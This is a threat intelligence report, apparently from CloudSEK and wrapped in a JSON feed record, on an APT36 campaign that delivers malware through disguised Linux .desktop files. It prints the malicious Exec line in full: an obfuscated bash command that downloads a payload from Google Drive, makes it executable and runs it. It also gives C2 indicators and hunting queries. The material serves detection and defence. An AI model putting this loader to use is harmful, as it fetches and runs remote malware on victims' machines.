|\r\n| T1564.001 | Hide Artifacts: Hidden Files and Directories | Dropping payload in hidden /tmp with obfuscation |\r\n| Defense Evasion | T1036 | Masquerading | Disguising malware as legitimate PDF shortcuts with icon spoofing |\r\n| T1027.001 | Obfuscated Files or Information: Binary Padding | Large base64 icon data to hide malicious commands |\r\n| Credential Access | T1110 | Brute Force / Credential Dumping (common in APT36 campaigns) | Credential harvesting focus in broader APT36 operations |\r\n| Discovery | T1518 | Software Discovery | Reconnaissance on victim environment (host info gathering) |\r\n| Command and Control | T1071 | Application Layer Protocol | Using WebSocket protocol for C2 communications |\r\n| T1095 | Non-Application Layer Protocol | WebSocket is a non-standard C2 communication |\r\n| T1105 | Ingress Tool Transfer | Downloading payload from Google Drive |\r\n| T1571 | Non-Standard Port | C2 over uncommon port 8080 using WebSocket |\r\n\r\n#### **Reference**\r\n\r\nhttps://x.com/SinghSoodeep/status/1955860231109665108\r\n\r\n\u00e2\u0080\u008d\r\n\r\n# Author\r\n\r\nAyush Panwar\r\n\r\n## Predict Cyber threats against your organization\r\n\r\nSchedule a Demo\r\n\r\n**Take action now**\r\n\r\n### Secure your organisation with our Award winning Products\r\n\r\nCloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.\r\n\r\nDigital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.\r\n\r\nLearn more about XVigil\r\n\r\nSoftware and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.\r\n\r\nLearn more about SVigil\r\n\r\nCreates a blueprint of an organization's external attack surface including the core infrastructure and the software components.\r\n\r\nLearn more about BeVigil Ent\r\n\r\nInstant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.\r\n\r\nLearn more about BeVigil\r\n\r\n# Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery\r\n\r\nPakistan-linked APT36 (Transparent Tribe) launched a new cyber-espionage campaign targeting Indian government and defense entities. Active in August 2025, the group used phishing ZIP files containing malicious Linux \u00e2\u0080\u009c.desktop\u00e2\u0080\u009d shortcuts that downloaded payloads from Google Drive. The malware created persistence, evaded detection, and connected to a WebSocket C2 server (seemysitelive[.]store). Investigators urge blocking the C2 domain, scanning for indicators of compromise, and tightening email and endpoint defenses.\r\n\r\nAugust 21, 2025\r\n\r\n8\r\n\r\nmin\r\n\r\nTable of Content\r\n\r\nExample H2\r\n\r\nSubscribe to CloudSEK Resources\r\n\r\nGet the latest industry news, threats and resources.\r\n\r\nSubscribe\r\n\r\n#### **Executive Summary**\r\n\r\nAPT36 \u00e2\u0080\u0094 also known as Transparent Tribe, Mythic Leopard, Earth Karkaddan, or Operation C-Major \u00e2\u0080\u0094 is a Pakistan-based advanced persistent threat (APT) group active since at least 2013. The group is primarily focused on cyber-espionage activities targeting Indian government entities, with a particular emphasis on defense personnel and related organizations. APT36 is well known for its persistent phishing campaigns and credential-harvesting operations used to gain access to sensitive environments.\r\n\r\nIn our recent investigations, we observed a new infection technique leveraging Linux desktop entry (.desktop) files as a malware delivery mechanism. The attack begins with a malicious ZIP archive containing a .desktop file disguised as a document (e.g., *PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf.desktop*). When executed, the loader downloads a dropper payload from Google Drive, stored there as hex-encoded strings. The malware then:\r\n\r\n1. Decodes the hex payload and writes it to /tmp/PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf-$(date +%s) (where date +%s provides a Unix timestamp).\r\n2. Adjusts permissions and executes the dropper binary.\r\n3. Opens a decoy PDF file in Firefox, creating the impression that a legitimate document has been accessed to reduce victim suspicion.\r\n\r\nOnce launched, the dropper performs several operations:\r\n\r\n* Executes anti-debugging and anti-sandbox checks.\r\n* Establishes persistence on the infected system.\r\n* Attempts to establish a connection with its command-and-control (C2) infrastructure using WebSockets.\r\n\r\n#### \u00e2\u0080\u008d\r\n\r\n#### **Analysis**\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf.zip** : Zip file contains .desktop malware file\r\n\r\n**MD5 Hash :** 6ac0fe0fa5d9af8193610d710a7da63c\r\n\r\n**SHA1 Hash :** 3e3169c513c02126028480421fb341a167cb9fcd\r\n\r\n**SHA256 Hash :** 34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d\r\n\r\n\u00e2\u0080\u008d\r\n\r\nAfter Unziping the zip file we get a .desktop file (**PROCUREMENT\\_OF\\_MANPORTABLE\\_\\&\\_COMPAC.pdf.desktop**)\r\n\r\n**MD5 Hash :** a484f85d132609a4a6b5ed65ece7d331\r\n\r\n**SHA1 Hash :** 1982f09bfab3a6688bb80249a079db1a759214b7\r\n\r\n**SHA256 Hash :** 6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113\r\n\r\n\u00e2\u0080\u008d\r\n\r\nA .desktop file is a plain text configuration file used primarily in Linux desktop environments to define application shortcuts and launchers. It provides metadata about an application, such as its name, icon, and the command to execute the program. These files allow an application to appear in system menus, on the desktop, or in panels, facilitating easy launching from graphical user interfaces.\r\n\r\n\u00e2\u0080\u008d\r\n\r\nFig 1 : .desktop file with pdf icon impersonating a real pdf file\r\n\r\n\u00e2\u0080\u008d\r\n\r\n\u00e2\u0080\u008d\r\n\r\nThe malicious code is concealed within the icon configuration.\r\n\r\nFig 2 : Code Stored in .desktop file\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Analysis for .desktop file**\r\n\r\n1. **Embedded Icon Data**\r\n\r\n# --- BEGIN EMBEDDED ICON DATA ---  \r\n# iVBORw0KGgqd1AvKicUBc7GuHI7XQwdKi/HWYzY53AMg1uzySt9pcU8vjp35LwaNYUW9Oqdg9oIc  \r\n# ... (Base64-encoded image data) ...  \r\n# --- END EMBEDDED ICON DATA ---\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* These lines contain an embedded icon image encoded in Base64 format.\r\n* This icon is used by the Linux desktop environment to visually represent the .desktop file.\r\n* Embedding the icon data helps disguise the file as a legitimate PDF document shortcut.\r\n* The malware hides itself \"between\" or alongside the icon data to avoid casual detection.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n2. **\u00c2\u00a0[Desktop Entry] Header**\r\n\r\n[Desktop Entry]\r\n\r\n* Marks the beginning of the desktop entry configuration as per the Desktop Entry Specification.\r\n* Indicates this file defines how the desktop environment should treat this item (e.g., application shortcut).\r\n\r\n\u00e2\u0080\u008d\r\n\r\n3. **Name Field**\r\n\r\nName=PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf\r\n\r\n* The displayed name of this shortcut, designed to look like a legitimate PDF file.\r\n* Using a plausible document name helps trick users into double-clicking.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n4. **Exec Field**\r\n\r\nExec=bash -c 'CTFuFt=\"/tmp/PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf-$(date +%s)\"; niLThe=\"$(echo ZWFNWEpXPSItLWZhaWwgLS1sb2NhdGlvbiAtLXNob3ctZXJyb3IiOyBjdXJsICR7ZWFNWEpXfSAiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVlFRaVR0NzhOM0twWUp6VmJFLTk1dUlMbk84NFd6Xy0iIHwgeHhkIC1yIC1w | base64 -d)\"; eval \"$niLThe\" > \"$CTFuFt\" && chmod +x \"$CTFuFt\" && \"$CTFuFt\" & iuqdST=\"$(echo ZmlyZWZveCAtLW5ldy13aW5kb3cgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS9maWxlL2QvMWtuMExfNldZYmZVVXgwZG16d2ZBTERuemtWSEpBUFR1L3ZpZXc/dXNwPWRyaXZlX2xpbmsi | base64 -d)\"; eval \"$iuqdST\" &'\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* This is the core malware execution command that runs when the .desktop file is executed.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Breakdown:**\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* CTFuFt is a variable set to a file path in /tmp/ with the original PDF name appended by a Unix timestamp to create a unique filename.\r\n\r\n* niLThe is set by decoding a base64-encoded string, which is a hex-encoded payload. i.e niLThe stores the following command\r\n\r\ncurl --fail --location --show-error \"https://drive.google.com/uc?export=download&id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz\\_-\" | xxd -r -p\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* This decoded payload is written to the file path $CTFuFt (/tmp dir).\r\n\r\n* The file is then given execute permissions (chmod +x).\r\n\r\n* The payload file is executed in the background (&).\r\n\r\n* Another base64-decoded command is stored in iuqdST which launches Firefox, opening a decoy PDF URL to mislead the user.\r\n\r\nfirefox --new-window \"https://drive.google.com/file/d/1kn0L\\_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive\\_link\r\n\r\n\u00e2\u0080\u008d\r\n\r\n* Both payload execution and decoy PDF opening happen concurrently.\r\n\r\n* Essentially, this runs a hidden malicious payload while showing a fake legitimate document to the victim.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n5. **Terminal Field**\r\n\r\nTerminal=false\r\n\r\n* Indicates that the command should run without opening a visible terminal window.\r\n\r\n* Helps hide the attack execution from user view.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n6. **Type Field**\r\n\r\nType=Application\r\n\r\n* Identifies this .desktop file as an application launcher.\r\n* This field tells the system that executing this file will run an application or command rather than opening a folder or link.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n7. **Icon Field**\r\n\r\nIcon=application-pdf\r\n\r\n* Specifies the icon that the desktop environment should display for this file.\r\n* Set to a generic PDF icon to further disguise the file as a document rather than an executable.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n8. **Categories Field**\r\n\r\nCategories=Utility;\r\n\r\n* Used by the desktop environment to categorize the application.\r\n* Here, it is marked as a utility, presumably to avoid suspicion.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n9. **X-GNOME-Autostart-enabled Field**\r\n\r\nX-GNOME-Autostart-enabled=true\r\n\r\n* GNOME-specific key that marks this file to be automatically started when the user logs in.\r\n* This could be an attempt to establish persistence by running the malicious .desktop file on every session start.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n10. **X-AppImage-Integrate Field**\r\n\r\nX-AppImage-Integrate=false\r\n\r\n* Prevents AppImage integration, a Linux feature related to portable apps.\r\n* Likely irrelevant for malware but included to maintain expected desktop file structure.\r\n\r\n11. **Second Embedded Icon Data Block**\r\n\r\n# --- BEGIN EMBEDDED ICON DATA ---  \r\n# iVBORw0KGgqkmDCyTlAPgMnafl2BLX+gyT9xeiQFmRad7Yp+eSZ18TseFE3GYswghqPWxLb2pEjg  \r\n# ... (Base64-encoded image data) ...  \r\n# --- END EMBEDDED ICON DATA ---\r\n\r\n* Another Base64-encoded icon embedded again at the end, perhaps to maintain file integrity or repel simpler detection.\r\n* This reinforces the disguise by embedding multiple icon images.\r\n\r\n\u00e2\u0080\u008d\r\n\r\nFig 3 : Snapshot of the decoy pdf\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Analysis for the dropped file (payload)**\r\n\r\nPayload file : ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=508a3568c56ed4f613cfafef23ff12c81ba627eb, with debug\\_info, not stripped\r\n\r\nWith section header analysis we can confirm this is a go binary.\r\n\r\n**MD5 Hash :** 566ddd4eb4ca8d4dd67b72ee7f944055\r\n\r\n**SHA1 Hash :** df4db969a69efc1db59f4d3c596ed590ee059777\r\n\r\n**SHA256 Hash :** 7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b\r\n\r\n\u00e2\u0080\u008d\r\n\r\nReverse Engineering the go binary gives some interesting findings:\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**1. Go Runtime & Stack Growth**\r\n\r\n* This is Go\u00e2\u0080\u0099s way of checking if there's enough stack space and growing the goroutine stack when needed.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**2. Randomization & Anti\u00e2\u0080\u0091Analysis Checks**\r\n\r\n* It seeds randomness with the current time.\r\n\r\n* Runs \"dummy evasion checks\" in a loop \u00e2\u0080\u0094 these are anti\u00e2\u0080\u0091debug / anti\u00e2\u0080\u0091sandbox routines designed to waste time or detect instrumentation.\r\n\r\n* Typical malware trick to throw off emulators and static analyzers.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**3. Client Creation**\r\n\r\n* This function seems to build a network \"client\" object for later use.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**4. Stealth / Persistence Modes**\r\n\r\nIt branches based on os.Args:\r\n\r\nIf os.Args == \"--hidden\", it triggers:\r\n\r\n(stealth install mode)\r\n\r\n\u00e2\u0080\u008d\r\n\r\nOtherwise, it installs persistence (likely adding itself to cron and backup daemon):\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**5. Logging & Announcements**\r\n\r\nThere are many calls to:\r\n\r\nlog.(\\*Logger).output(...)  \r\nmain.main.Println.funcX  \r\nmain.main.Printf.funcY\r\n\r\nWhere it logs messages like:\r\n\r\n\u00e2\u0080\u008d\r\n\r\n\"Stealth client starting\u00e2\u0080\u00a6\"\r\n\r\n\"(PID: ...)\"  \r\n\"Attempting to connect to server: ...\"\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**6. Command & Control Behavior**\r\n\r\nThe loop at the end is critical:\r\n\r\n* That Base64 blob decodes to a WebSocket URL (ws://seemysitelive[.]store:8080/ws)\r\n* The client continually tries to connect to it.\r\n* If the connection fails, it logs then sleeps and retries \u00e2\u0080\u0094 classic C2 (Command & Control) beaconing loop.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**7. Syscall Usage**\r\n\r\n* This is either doing low\u00e2\u0080\u0091level process manipulation (possibly hiding, persistence, or privilege escalation).\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Attribution**\r\n\r\nThe C2 we found was running a websocket which returned \u00e2\u0080\u009cWelcome to Stealth Server\u00e2\u0080\u009d. Let\u00e2\u0080\u0099s check the C2 on Censys to identify if we can gather any \u00e2\u0080\u009cStealth Server\u00e2\u0080\u009d related artifacts.\r\n\r\nFig 4. Censys Query results\r\n\r\n\u00e2\u0080\u008d\r\n\r\nSearched for IP addresses using the following Censys query:\r\n\r\nservices.http.response.html\\_tags:\"<title>Stealth Server - Login</title>\"\r\n\r\nResults:\r\n\r\n* 4 IPs matched the query.\r\n* 3 of these were identified as malicious:\r\n* 2 are our C2 servers.\r\n* 1 is a previously attributed C2 associated with APT36.\r\n\r\nC2 domain: seemysitelive[.]store\u00c2\r\n\r\nC2 IP:\u00c2\u00a0 164.215.103.55 (related to ASN: AS 213373 ;\u00c2\u00a0 IP Connect Inc )\r\n\r\nConnecting to websocket give : \"Welcome to Stealth Server\"\r\n\r\n*Fig 5. Virustotal results for the domain*\r\n\r\n\u00e2\u0080\u008d\r\n\r\n*Fig 6. Response from the websocket*\r\n\r\n\u00e2\u0080\u008d\r\n\r\n\u00e2\u0080\u008d\r\n\r\n*Diamond model for APT36*\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Impact**\r\n\r\nThe use of google drive in their attack lifecycle represents a significant evolution in the threat group's capabilities, introducing spearphishing vectors that pose higher risks to Linux-based government and defense infrastructure.\u00c2\r\n\r\n**Impact on Enterprises and Governments**\r\n\r\n**Targeted Espionage on Critical Sectors:** APT36 attacks focus on government and defense personnel, risking leakage of sensitive defense and strategic information that can compromise national security and organizational confidentiality.\r\n\r\n**Stealthy Persistence and Evasion:** Using disguised .desktop files and sophisticated anti-debugging/anti-sandbox techniques, the malware persists undetected on Linux systems, allowing prolonged unauthorized access and espionage.\r\n\r\n**Supply Chain and Procurement Security Threat:** The campaign uses procurement-themed phishing to infiltrate organizations, highlighting vulnerabilities in procurement workflows which can lead to operational disruption, fraud, and loss of trust.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Command & Control Over Non-Standard Protocols:** Utilizing WebSocket communications on port 8080, the campaign maintains stealthy remote control and exfiltration capabilities, complicating detection and incident response efforts.\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Indicators of Compromise (IOCs)\u00c2**\r\n\r\n**File Hashes**\r\n\r\nMalicious ZIP Archive  \r\nFilename: PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf.zip  \r\nMD5:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 6ac0fe0fa5d9af8193610d710a7da63c  \r\nSHA1: \u00c2\u00a0 \u00c2\u00a0 3e3169c513c02126028480421fb341a167cb9fcd  \r\nSHA256: \u00c2\u00a0 34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d\r\n\r\nMalicious .desktop File  \r\nFilename: PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf.desktop  \r\nMD5:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 a484f85d132609a4a6b5ed65ece7d331  \r\nSHA1: \u00c2\u00a0 \u00c2\u00a0 1982f09bfab3a6688bb80249a079db1a759214b7  \r\nSHA256: \u00c2\u00a0 6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113\r\n\r\nGo Binary Payload  \r\nFilename: ELF 64-bit LSB executable (dropped payload)  \r\nMD5:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 566ddd4eb4ca8d4dd67b72ee7f944055  \r\nSHA1: \u00c2\u00a0 \u00c2\u00a0 df4db969a69efc1db59f4d3c596ed590ee059777  \r\nSHA256: \u00c2\u00a0 7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Network Indicators**\r\n\r\nCommand & Control Infrastructure\r\n\r\nDomain: \u00c2\u00a0 seemysitelive[.]store  \r\nIP: \u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 164.215.103.55  \r\nASN:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 AS 213373 (IP Connect Inc)  \r\nProtocol: WebSocket (ws://)  \r\nPort: \u00c2\u00a0 \u00c2\u00a0 8080  \r\nURL:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 ws://seemysitelive[.]store:8080/ws  \r\nBanner: \u00c2\u00a0 \"Welcome to Stealth Server\"\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Payload Delivery Infrastructure**\r\n\r\nPlatform: Google Drive\r\n\r\nAttacker Gmail : [email\u00a0protected]  \r\nURL Pattern: https://drive.google.com/uc?export=download&id=[FILE\\_ID]  \r\nDecoy URL: https://drive.google.com/file/d/1kn0L\\_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive\\_link\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**File System Artifacts**\r\n\r\nPayload Drop Locations  \r\nPath Pattern: /tmp/PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf-[TIMESTAMP]  \r\nExample:\u00c2\u00a0 \u00c2\u00a0 \u00c2\u00a0 /tmp/PROCUREMENT\\_OF\\_MANPORTABLE\\_&\\_COMPAC.pdf-1692547200  \r\nPermissions:\u00c2\u00a0 Executable (chmod +x applied)\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Behavioral Indicators**\r\n\r\nProcess Execution Patterns  \r\nCommand: bash -c [BASE64\\_ENCODED\\_COMMANDS]  \r\nPattern: curl --fail --location --show-error [GOOGLE\\_DRIVE\\_URL] | xxd -r -p  \r\nProcess: Firefox launch with decoy PDF URL  \r\nBinary:\u00c2\u00a0 Go executable with anti-debugging features\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Network Communication Patterns**\r\n\r\nProtocol: \u00c2\u00a0 \u00c2\u00a0 WebSocket connections to port 8080  \r\nRetry Logic:\u00c2\u00a0 10-second intervals on connection failure  \r\nUser-Agent: \u00c2\u00a0 Go HTTP client patterns  \r\nPersistence:\u00c2\u00a0 Continuous reconnection attempts\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Remediation Recommendations**\r\n\r\n**Network Security**\r\n\r\n* Block C2 Infrastructure\r\n* Add seemysitelive[.]store and 164.215.103.55 to network blocklists\r\n* Monitor and block WebSocket connections to port 8080\r\n* Implement DNS sinkholing for the malicious domain\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Endpoint Detection**\r\n\r\n* Search for file hashes across all Linux systems\r\n* Hunt for files in /tmp/ matching the naming pattern\r\n* Identify systems with suspicious .desktop files\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Email Security**\r\n\r\n* Block ZIP attachments containing .desktop files\r\n* Implement additional scanning for procurement-themed emails\r\n* Review email logs for similar attachment patterns\r\n\r\n\u00e2\u0080\u008d\r\n\r\n**Hunt Operations**\r\n\r\n1. Threat Hunting Queries\r\n\r\n\u00c2\u00a0\u00c2\u00a0\u00c2\r\n\r\n# Search for suspicious .desktop files  \r\n \u00c2\u00a0 find / -name \"\\*.desktop\" -newer [recent\\_date] -exec grep -l \"bash -c\" {} \\;  \r\n \u00c2\u00a0   \r\n \u00c2\u00a0 # Look for hex-decoded payloads  \r\n \u00c2\u00a0 grep -r \"xxd -r -p\" /var/log/  \r\n \u00c2\u00a0   \r\n \u00c2\u00a0 # Find Go binaries in suspicious locations  \r\n \u00c2\u00a0 find /tmp /var/tmp -type f -executable -exec file {} \\; | grep \"Go building\"\r\n\r\n\u00e2\u0080\u008d\r\n\r\n2. Memory Analysis\r\n\r\n\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0- Dump memory of suspicious Go processes\r\n\r\n\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0- Analyze WebSocket connections in memory\r\n\r\n\u00c2\u00a0\u00c2\u00a0\u00c2\u00a0- Check for embedded configuration data\r\n\r\n\u00e2\u0080\u008d\r\n\r\n#### **Appendix**\r\n\r\n## ATT&CK Tactics and Techniques\r\n\r\n| ATT&CK Tactic | ATT&CK Technique ID | Technique Name | Description / Relevance |\r\n| --- | --- | --- | --- |\r\n| Initial Access | T1566 | Phishing | Delivery via phishing ZIP attachments containing malicious .desktop files |\r\n| Execution | T1204.002 | User Execution: Malicious File | Execution of disguised .desktop files by users |\r\n| T1064 | Scripting | Use of bash script commands in the .desktop Exec field to download payload |\r\n| Persistence | T1543.003 | Create or Modify System Process: Systemd Service | Persistence via autostart .desktop files and likely cron/systemd services |\r\n| T1564.001 | Hide Artifacts: Hidden Files and Directories | Dropping payload in hidden /tmp with obfuscation |\r\n| Defense Evasion | T1036 | Masquerading | Disguising malware as legitimate PDF shortcuts with icon spoofing |\r\n| T1027.001 | Obfuscated Files or Information: Binary Padding | Large base64 icon data to hide malicious commands |\r\n| Credential Access | T1110 | Brute Force / Credential Dumping (common in APT36 campaigns) | Credential harvesting focus in broader APT36 operations |\r\n| Discovery | T1518 | Software Discovery | Reconnaissance on victim environment (host info gathering) |\r\n| Command and Control | T1071 | Application Layer Protocol | Using WebSocket protocol for C2 communications |\r\n| T1095 | Non-Application Layer Protocol | WebSocket is a non-standard C2 communication |\r\n| T1105 | Ingress Tool Transfer | Downloading payload from Google Drive |\r\n| T1571 | Non-Standard Port | C2 over uncommon port 8080 using WebSocket |\r\n\r\n#### **Reference**\r\n\r\nhttps://x.com/SinghSoodeep/status/1955860231109665108\r\n\r\n\u00e2\u0080\u008d\r\n\r\nAyush Panwar\r\n\r\nSubscribe to CloudSEK Resources\r\n\r\nGet the latest industry news, threats and resources.\r\n\r\nSubscribe\r\n\r\n...",
        "id": "1727",
        "event_id": "336496",
        "timestamp": "1755864079",
        "uuid": "c19d51c9-d60f-48d6-b4c9-9139e4d35ce2",
        "deleted": false
      }
    ]
  }
}